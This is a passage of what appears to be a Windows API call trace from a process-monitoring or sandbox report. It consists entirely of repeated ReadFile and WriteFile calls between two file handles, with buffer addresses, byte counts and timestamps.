(in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3cc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.086] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.086] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.087] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.087] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.088] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.088] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x137, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.089] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.089] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.090] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x214, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.090] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.091] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.091] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x164, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.092] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.092] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.093] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xc6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.093] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.095] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.095] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x13c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.096] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.096] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.097] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x232, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.097] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.098] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.098] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3a4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.099] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.099] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.100] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.100] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.101] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.101] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1c6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.102] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.102] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.103] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x138, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.103] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.104] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.104] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xb6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.105] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.105] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.106] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.106] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.107] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.107] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.108] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.108] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.109] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.109] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x319, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.110] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.110] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.111] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.111] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.112] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.112] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.113] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.113] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.114] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.114] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.115] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3d5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.115] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.116] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.116] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.117] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xa8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.117] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.118] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.118] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.119] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x16c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.119] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.120] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x391, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.120] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.121] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.121] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x78, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.122] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.122] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.123] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x144, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.123] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.124] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.124] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xd2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.125] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.125] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.126] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3f8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.126] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.127] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.127] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.128] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x249, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.128] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.129] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.129] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.130] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x346, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.130] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.131] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.132] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.132] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.132] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.133] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.133] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.134] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.134] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x7a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.135] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.135] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.136] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x19, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: 